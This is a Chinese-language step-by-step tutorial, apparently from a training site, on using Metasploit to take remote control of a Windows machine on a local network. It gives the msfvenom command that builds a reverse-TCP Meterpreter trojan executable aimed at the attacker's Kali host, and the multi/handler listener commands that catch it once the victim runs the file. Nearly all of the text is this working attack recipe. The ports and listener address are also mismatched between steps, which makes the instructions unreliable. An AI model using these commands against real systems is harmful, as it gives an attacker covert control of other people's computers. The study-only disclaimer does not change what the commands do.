用metasploit进行局域网远程控制
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。
实验原理:用metasploit制作木马,发送到目标主机上,双击运行后反向连接到kali监听的端口,从而控制目标主机
打开kali
打开终端,sudo su ,输入账户密码,进入超级管理员权限,输入ifconfig,记录kali的ip
制作木马(先不讲免杀),msfvenom -p windows/meterpreter/reverse_tcp lhost=[kali的ip] lport=6667 -f exe > shell.exe
将制作好的木马传到本地的windows电脑中,已安装VMware tools的可以直接复制粘贴,未安装的可以在本机windows安装xshell,使用其中的xftp进行文件传输,相关教程及软件会在qq群中分享
Kali终端中输入msfconsole,进入metasploit控制台
对指定端口进行监听,use exploit/multi/handler,set lhost=127.0.0.1,set lport=6666,set payload=windows/meterpreter/reverse_tcp,exploit,依次输入以上内容进行监听
在我们的windows电脑中双击刚刚生成的木马
稍等,我们的windows已经上线了
本文所涉及内容严禁用作非法用途,仅作个人学习使用
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作! |
